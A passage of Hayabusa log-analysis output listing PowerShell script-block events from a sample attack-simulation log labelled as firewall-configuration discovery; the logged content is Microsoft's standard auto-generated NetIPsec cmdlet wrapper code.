$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and 
(@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerSh",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh 
Scriptblock Log,"function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false 
if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeRule ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() 
function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
